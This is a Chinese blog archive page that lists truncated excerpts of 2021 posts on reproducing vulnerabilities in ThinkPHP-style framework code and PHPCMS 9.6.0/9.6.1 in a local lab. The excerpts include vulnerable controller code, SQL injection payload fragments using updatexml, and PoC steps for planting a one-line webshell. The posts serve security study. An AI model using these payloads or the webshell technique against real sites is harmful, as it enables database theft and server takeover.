07 2021 档案

摘要:漏洞测试代码: public function index() { $column=input('column'); $data=db('users')->max($column); dump($data); } 复现: payload: ?column=id),updatexml(1,concat 阅读全文
posted @ 2021-07-26 23:27 1jzz 阅读(182) 评论(0) 推荐(0)
摘要:漏洞测试代码: public function index() { $password=input('password/a'); $data = db('users')->where("id",'1')->update(["password"=>$password]); dump($data); } 阅读全文
posted @ 2021-07-26 20:44 1jzz 阅读(406) 评论(0) 推荐(0)
摘要:控制器代码: public function index(){ $username=I("username"); $order=I("order"); $data=M('users')->where(array('username'=>$username))->order($order)->sele 阅读全文
posted @ 2021-07-23 12:16 1jzz 阅读(149) 评论(0) 推荐(0)
摘要:控制器代码: public function index(){ $id=I('id'); $res=M('users')->find($id); dump($res); } 复现: payload: id[table]=users where 1 and updatexml(1,concat(0x7 阅读全文
posted @ 2021-07-22 17:47 1jzz 阅读(232) 评论(0) 推荐(0)
摘要:漏洞代码: public function index(){ $condition['username']=I('username'); $data['password']=I('password'); $res=M('users')->where($condition)->save($data); 阅读全文
posted @ 2021-07-21 22:59 1jzz 阅读(328) 评论(0) 推荐(0)
摘要:环境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影响版本: PHPCMS 9.6.1 复现 1、访问index.php?m=wap&c=index&siteid=1得到加密后的cookie值 2、访问/index.php?m=a 阅读全文
posted @ 2021-07-07 23:11 1jzz 阅读(834) 评论(0) 推荐(0)
摘要:环境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影响版本: PHPCMS 9.6.0 复现: 1、首先访问/index.php?m=wap&c=inde&siteid=1获取cookie 2、访问/index.php?m=att 阅读全文
posted @ 2021-07-07 14:06 1jzz 阅读(272) 评论(0) 推荐(0)
摘要:环境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影响版本: PHPCMS 9.6.0 POC: 首先需要在1.txt中写入一句话木马 siteid=1&modelid=11&username=test&password=1234 阅读全文
posted @ 2021-07-06 18:34 1jzz 阅读(1891) 评论(0) 推荐(0)